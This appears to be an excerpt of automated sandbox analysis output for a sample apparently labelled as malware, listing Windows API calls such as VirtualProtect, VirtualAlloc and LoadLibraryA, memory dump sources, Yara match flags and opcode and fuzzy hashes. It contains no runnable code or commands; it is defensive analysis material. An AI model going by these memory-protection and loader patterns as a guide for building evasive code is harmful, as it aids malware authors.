                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: allocator$Max_valueMin_valueXinvalid_argumentstd::_
                                                              • String ID:
                                                              • API String ID: 3868691235-0
                                                              • Opcode ID: 0138b62f7dce15abdcc9b456c468e231641729e8c990895106847cfbb7c0d36a
                                                              • Instruction ID: cf68f9ae4589754578288b0725a65401ed9b5dedc3a14a2ade2f6f19eb67af4b
                                                              • Opcode Fuzzy Hash: 0138b62f7dce15abdcc9b456c468e231641729e8c990895106847cfbb7c0d36a
                                                              • Instruction Fuzzy Hash: E441C5B5D00149EFCF08DF99D9919AEBBB5BF8C300F208599E559A7341DB30AE41CBA0
                                                              APIs
                                                              • WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,005F7480,00000000,?,00000000,005F112F,00000000,00000000), ref: 005F6F73
                                                              • GetLastError.KERNEL32(?,005F7480,00000000,?,00000000,005F112F,00000000,00000000,?,00000000,?,005E97B5,005F112F,00000000,005E97B5,?), ref: 005F6F99
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: ErrorFileLastWrite
                                                              • String ID:
                                                              • API String ID: 442123175-0
                                                              • Opcode ID: 0f69a69eb061426743d6f3277cced0efd153d689ac9e6c8108dfff11eb40f40f
                                                              • Instruction ID: 34805d4b508eade8eaf6c564f7cf26ad0adaaa351efdd3000e8884f864bcd0ef
                                                              • Opcode Fuzzy Hash: 0f69a69eb061426743d6f3277cced0efd153d689ac9e6c8108dfff11eb40f40f
                                                              • Instruction Fuzzy Hash: 77217435A0021D9FCF15CF29DD809E9BBBAFB8C305F1444AAEA46D7216D630DD42CB65
                                                              APIs
                                                              • GetStdHandle.KERNEL32(000000F6), ref: 005F681C
                                                              • GetFileType.KERNEL32(00000000), ref: 005F682E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: FileHandleType
                                                              • String ID:
                                                              • API String ID: 3000768030-0
                                                              • Opcode ID: 500df71c76b8d187aae44cc7ea53c4196946a85e11635cb58d78d30da737612b
                                                              • Instruction ID: 489b522f611310bb21f4819cf2099dcb72c78ef94cc84aefe71308577f8337c6
                                                              • Opcode Fuzzy Hash: 500df71c76b8d187aae44cc7ea53c4196946a85e11635cb58d78d30da737612b
                                                              • Instruction Fuzzy Hash: 8E11D3716047554ACB304E3E8C98632BEE5B7563B4B380B1ED2B6975F2C338D886D691
                                                              APIs
                                                              • SetFilePointerEx.KERNEL32(00000000,00000000,00616918,005E97B5,00000002,005E97B5,00000000,?,?,?,005FB19D,00000000,?,005E97B5,00000002,00616918), ref: 005FB0CF
                                                              • GetLastError.KERNEL32(005E97B5,?,?,?,005FB19D,00000000,?,005E97B5,00000002,00616918,00000000,005E97B5,00000000,00616918,0000000C,005F1206), ref: 005FB0DC
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: ErrorFileLastPointer
                                                              • String ID:
                                                              • API String ID: 2976181284-0
                                                              • Opcode ID: ef656fcec37267ad8b6bbf7e6e80a945a593875900556181c7e30ca36807d36d
                                                              • Instruction ID: 0da2953fe4dacd9a186b9e8e2ac5755ac41b20e8c1979c35c04a5198cd450169
                                                              • Opcode Fuzzy Hash: ef656fcec37267ad8b6bbf7e6e80a945a593875900556181c7e30ca36807d36d
                                                              • Instruction Fuzzy Hash: FB010032604619EFDB058F59DC49DAF3F2AFB84320B244248F9119B291EB72ED41CBA0
                                                              APIs
                                                                • Part of subcall function 036C98D2: LoadLibraryA.KERNEL32(00000000,?,?), ref: 036C9964
                                                              • VirtualProtect.KERNEL32(00000000,00000004,00000040,?), ref: 036C77E7
                                                              • VirtualProtect.KERNEL32(00000000,00000004,?,?), ref: 036C780A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000003.2552254239.00000000036C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_3_36c0000_LisectAVT_2403002B_185.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ProtectVirtual$LibraryLoad
                                                              • String ID:
                                                              • API String ID: 895956442-0
                                                              • Opcode ID: f8598576150d5a0620274e77ba00d3ce24ec92924df4b670bdb29c09dfee1e24
                                                              • Instruction ID: 85337127eff14e1afa8f3625a5dec311abf3192935144c62d91939cef2233eb3
                                                              • Opcode Fuzzy Hash: f8598576150d5a0620274e77ba00d3ce24ec92924df4b670bdb29c09dfee1e24
                                                              • Instruction Fuzzy Hash: EEF06DB62106447EE710E664CC41FFB72ECEF45B50F44482CFB16D6180EB61EA01DBA5
                                                              APIs
                                                              • RtlFreeHeap.NTDLL(00000000,00000000,?,006008E5,005EDE01,00000000,005EDE01,?,00600B86,005EDE01,00000007,005EDE01,?,0060107A,005EDE01,005EDE01), ref: 005F7547
                                                              • GetLastError.KERNEL32(005EDE01,?,006008E5,005EDE01,00000000,005EDE01,?,00600B86,005EDE01,00000007,005EDE01,?,0060107A,005EDE01,005EDE01), ref: 005F7552
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 485612231-0
                                                              • Opcode ID: f02c50e31f7d52994244594c7e445afdbd560a739b9944ffec8b9eddd30ad3ef
                                                              • Instruction ID: a85ddb6338f380f9278cd0ced2269d07e8acf98ebd965c557d36e7767102e815
                                                              • Opcode Fuzzy Hash: f02c50e31f7d52994244594c7e445afdbd560a739b9944ffec8b9eddd30ad3ef
                                                              • Instruction Fuzzy Hash: 79E08C3260461DABDB116BA4FC0DBAA3E6AAB44B51F204029F708861A1DB388940C7A9
                                                              APIs
                                                              • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 036C859E
                                                              • VirtualFree.KERNELBASE(00000000,00000000,0000C000), ref: 036C88E2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000003.2552254239.00000000036C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_3_36c0000_LisectAVT_2403002B_185.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Virtual$AllocFree
                                                              • String ID:
                                                              • API String ID: 2087232378-0
                                                              • Opcode ID: 2923ffbbd088fcb14a2ba6a0f44f74b26ffba7a218e7267c1327e4f48e88d229
                                                              • Instruction ID: dcea80f10a5a5e2e4a1ac7342ba5bca62253a89b1d5740110903828d65a608aa
                                                              • Opcode Fuzzy Hash: 2923ffbbd088fcb14a2ba6a0f44f74b26ffba7a218e7267c1327e4f48e88d229
                                                              • Instruction Fuzzy Hash: 85B1E131621B86ABDB31EA60CD80BBBF7E8FF05310F18092DE55997650E731E560CBA5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000003.2552168143.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_3_5c90000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: tMl$tMl
                                                              • API String ID: 0-3200977928
                                                              • Opcode ID: b752965e72ac800e0ca3bcfc9dd4261b4b5994ed984cb1b2912d5b6437c37ec6
                                                              • Instruction ID: d8be823d8feb4202bfe599ea4719a7aa3ea29c17cf477cad547fdd06dc574fad
                                                              • Opcode Fuzzy Hash: b752965e72ac800e0ca3bcfc9dd4261b4b5994ed984cb1b2912d5b6437c37ec6
                                                              • Instruction Fuzzy Hash: 4C51BD75B043598FCB15DBB988546BEBFF6FF89200B0844A9D446DB391DB38D901CBA1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000003.2552168143.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_3_5c90000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 8Vl$LR]q
                                                              • API String ID: 0-1558500584
                                                              • Opcode ID: 4e0af83d93f490cf963593ecf87fa4074d287e7e5a38e8934e96576327f3042c
                                                              • Instruction ID: 2f487b070ed19e6b7b0f2456eb7e7e344858890a3e9183cf868f4d20ff96c35c
                                                              • Opcode Fuzzy Hash: 4e0af83d93f490cf963593ecf87fa4074d287e7e5a38e8934e96576327f3042c
                                                              • Instruction Fuzzy Hash: 5B418A75B142089FDB18DF39D858A6DBBB2FF88700F148569E406EB3A0DB30AC01CB95
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000003.2552168143.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_3_5c90000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 8Vl$LR]q
                                                              • API String ID: 0-1558500584
                                                              • Opcode ID: a7e0698f90373463f3d21c3ce089d01f748948965984e58b7b458add12820aad
                                                              • Instruction ID: d689938bed887fb0324d856df74626268004f8e9ba5bca9550bff3f24ed96e47
                                                              • Opcode Fuzzy Hash: a7e0698f90373463f3d21c3ce089d01f748948965984e58b7b458add12820aad
                                                              • Instruction Fuzzy Hash: 32412B75B142089FDB18DF69D858A6E7BB2FF88710F118469E406EB3A0DB74EC01CB95
                                                              APIs
                                                                • Part of subcall function 005E6430: std::ios_base::clear.LIBCPMTD ref: 005E6461
                                                              • fpos.LIBCPMTD ref: 005E399A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: fposstd::ios_base::clear
                                                              • String ID:
                                                              • API String ID: 1508181384-0
                                                              • Opcode ID: e1efdcaf502ad074db20d0c6b07f3c64875bfb445f1b256337aefa476a8e9f45
                                                              • Instruction ID: 63839f0dfd22bb168c4eada481a6acdca87461c5c8cf88766cbed1c8ecbe0b33
                                                              • Opcode Fuzzy Hash: e1efdcaf502ad074db20d0c6b07f3c64875bfb445f1b256337aefa476a8e9f45
                                                              • Instruction Fuzzy Hash: E5313DB5A0061A9FCB08DF95C891BAEB7B5FF88714F108618E525AB3D1DB31A901CB90
                                                              APIs
                                                                • Part of subcall function 005E5750: std::ios_base::good.LIBCPMTD ref: 005E578C
                                                              • char_traits.LIBCPMTD ref: 005E86CB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: char_traitsstd::ios_base::good
                                                              • String ID:
                                                              • API String ID: 160274934-0
                                                              • Opcode ID: 059bae58ca83c72737ee6a6e78ec2e017dd66e68e09294272231ffe88c6eb758
                                                              • Instruction ID: 2a4aab5b2ddf720138deee0d50c2d6ff8977e5f012cc9a5bc52b791a2e685797
                                                              • Opcode Fuzzy Hash: 059bae58ca83c72737ee6a6e78ec2e017dd66e68e09294272231ffe88c6eb758
                                                              • Instruction Fuzzy Hash: 7D312BB4D0024A9FCF08DF95C991AFEBBB5FF48314F208119E545BB281DB35AA00CBA0
                                                              APIs
                                                              • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 005E4C8A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: ProcessorVirtual$Concurrency::RootRoot::
                                                              • String ID:
                                                              • API String ID: 3936482309-0
                                                              • Opcode ID: 0e974cc9f43296fd16084f26bfb80b12497d577ee30dbb94e77df252dbc1c587
                                                              • Instruction ID: 9192f7040db79c4b7530acb0237282936ddebf65fc3c80bbdba80c31cb20ae23
                                                              • Opcode Fuzzy Hash: 0e974cc9f43296fd16084f26bfb80b12497d577ee30dbb94e77df252dbc1c587
                                                              • Instruction Fuzzy Hash: 2C3143B4A0025ADFDB08CF98CD95BAEBBB1FF88704F148558E5566B385C771AD00CB91
                                                              APIs
                                                              • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 005E375A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: ProcessorVirtual$Concurrency::RootRoot::
                                                              • String ID:
                                                              • API String ID: 3936482309-0
                                                              • Opcode ID: 93970942868f3920fc955ee670ac7538057266f07797ec8a0468cb0e3093f797
                                                              • Instruction ID: 76f23b17772328796895f5617f020c264a313373f38a54ecd15f2fcb133713b0
                                                              • Opcode Fuzzy Hash: 93970942868f3920fc955ee670ac7538057266f07797ec8a0468cb0e3093f797
                                                              • Instruction Fuzzy Hash: 533141B4A0025ADFDB08DF98C995BAEBBB2FF84704F148658E4556B381C771AD00CB91
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: allocator
                                                              • String ID:
                                                              • API String ID: 3447690668-0
                                                              • Opcode ID: e43460ef727c0a392b97d5f3b85cb484f29c45baabe6a73a995a193699bd0af5
                                                              • Instruction ID: b9529a5601284ccb6effc4755e8ce725277d3648ee96f223723e76abfc472f55
                                                              • Opcode Fuzzy Hash: e43460ef727c0a392b97d5f3b85cb484f29c45baabe6a73a995a193699bd0af5
                                                              • Instruction Fuzzy Hash: 2321A7B4A0064A8FCB08DF99C991BAFBBB5FF89300F104669E415AB394D7346801CFA1
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: __wsopen_s
                                                              • String ID:
                                                              • API String ID: 3347428461-0
                                                              • Opcode ID: 4fc36f1438358cfdd458659f52a6dd646c9b5fa63342d3cc454e0d1ef4ffadbf
                                                              • Instruction ID: 9429f7c0d8b8037f0a13d1cdef0809c4a0248e249d8fd4e606b0f487307cfeea
                                                              • Opcode Fuzzy Hash: 4fc36f1438358cfdd458659f52a6dd646c9b5fa63342d3cc454e0d1ef4ffadbf
                                                              • Instruction Fuzzy Hash: 59111571A0420AAFDB05DF58E94599B7BF9EF48304F044069F909AB251D770EE11CBA4
                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(00000008,005E112E,005EEC9B,?,005F6674,00000001,00000364,00000006,000000FF,005EEC9B,005EEC9B,?,005EDF6C,005F13BE,FF85FFFF), ref: 005F86C7
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1279760036-0
                                                              • Opcode ID: 27b9a49e5db20c3e8aaf175d980478b2a898a867c7c033d7fd75ce85d6b441b8
                                                              • Instruction ID: bd3278f881252d163013cad1e7981114d73b29df82f17eb8be9200a06d09ee21
                                                              • Opcode Fuzzy Hash: 27b9a49e5db20c3e8aaf175d980478b2a898a867c7c033d7fd75ce85d6b441b8
                                                              • Instruction Fuzzy Hash: FCF0B43260063DA7DF215A72AC09A7B7F59BF917A0B288022FB04D6184EE38DC0186E4
                                                              APIs
                                                              • stdext::threads::lock_error::lock_error.LIBCPMTD ref: 005EA3F3
                                                                • Part of subcall function 005EB1A3: RaiseException.KERNEL32(E06D7363,00000001,00000003,005E141C,?,?,?,005E141C,?,00616F3C), ref: 005EB203
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: ExceptionRaisestdext::threads::lock_error::lock_error
                                                              • String ID:
                                                              • API String ID: 3447279179-0
                                                              • Opcode ID: 4dc6b5d106579586ee56212a503f47a8d40adda815a7871987497bb195fc48c7
                                                              • Instruction ID: e199b34f9cc122dddcbaffc9527c5984c3cf27331360dec45155c499d3509562
                                                              • Opcode Fuzzy Hash: 4dc6b5d106579586ee56212a503f47a8d40adda815a7871987497bb195fc48c7
                                                              • Instruction Fuzzy Hash: DAF0243880038EB68B1CB6B6FC1EADD3F2D3E40320F504620B994910D1EF70A655C1D2
                                                              APIs
                                                              • Concurrency::cancel_current_task.LIBCPMTD ref: 005E8B47
                                                                • Part of subcall function 005E1400: stdext::threads::lock_error::lock_error.LIBCPMTD ref: 005E1409
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: Concurrency::cancel_current_taskstdext::threads::lock_error::lock_error
                                                              • String ID:
                                                              • API String ID: 2103942186-0
                                                              • Opcode ID: 7c0a3bddb8505c8a4b1dd132b19cb8cbf4b43b9558918ad84463fe1d355bfc67
                                                              • Instruction ID: ab5b834de8693d095f86bfb86cf727a2e56d2430d7041f33542c42fee9c37cb4
                                                              • Opcode Fuzzy Hash: 7c0a3bddb8505c8a4b1dd132b19cb8cbf4b43b9558918ad84463fe1d355bfc67
                                                              • Instruction Fuzzy Hash: 2CF03CB4D00548EBCF08EFA9D4856ADFBB5BF84344F1081A9E8599B385E630AE50DB85
                                                              APIs
                                                              • allocator.LIBCONCRTD ref: 005E8925
                                                                • Part of subcall function 005E7540: _Allocate.LIBCONCRTD ref: 005E7554
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: Allocateallocator
                                                              • String ID:
                                                              • API String ID: 40054573-0
                                                              • Opcode ID: 88af452f1867c620a7ed91bca1dbf0af90099f589f6509480a8af0c0073b2557
                                                              • Instruction ID: 47c65b235b971abb68485e9f13a86fa430b15a979bfc27a013e6ddad4daad06d
                                                              • Opcode Fuzzy Hash: 88af452f1867c620a7ed91bca1dbf0af90099f589f6509480a8af0c0073b2557
                                                              • Instruction Fuzzy Hash: 220146B4E05209EFCF04DF99D5919AEBBF1FF89304F2081A9D949A7341D730AA51CB94
                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(00000000,005FF487,00000000,?,005FF487,00000220,?,?,00000000), ref: 005F9077
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1279760036-0
                                                              • Opcode ID: a3f6b2c55a8e050414fcf7f23432a091f3e84fb013df5b70d1a4d60bda43571d
                                                              • Instruction ID: 7cf383e95872d9a602f542fbc35fc7d09e01d1b6d593e003915228688bbd0865
                                                              • Opcode Fuzzy Hash: a3f6b2c55a8e050414fcf7f23432a091f3e84fb013df5b70d1a4d60bda43571d
                                                              • Instruction Fuzzy Hash: 6EE03021605A2EA6EB312676AC0CBBF6E5DBFC27A0F194121EB4496190DF68DC0181A5
                                                              APIs
                                                              • CreateFileW.KERNEL32(?,00000000,?,006057F2,?,?,00000000,?,006057F2,?,0000000C), ref: 0060541F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID:
                                                              • API String ID: 823142352-0
                                                              • Opcode ID: 56b1c12b65d7ef96c005c94ff03e0dae73d9c17246bab99fb35df3000138ad03
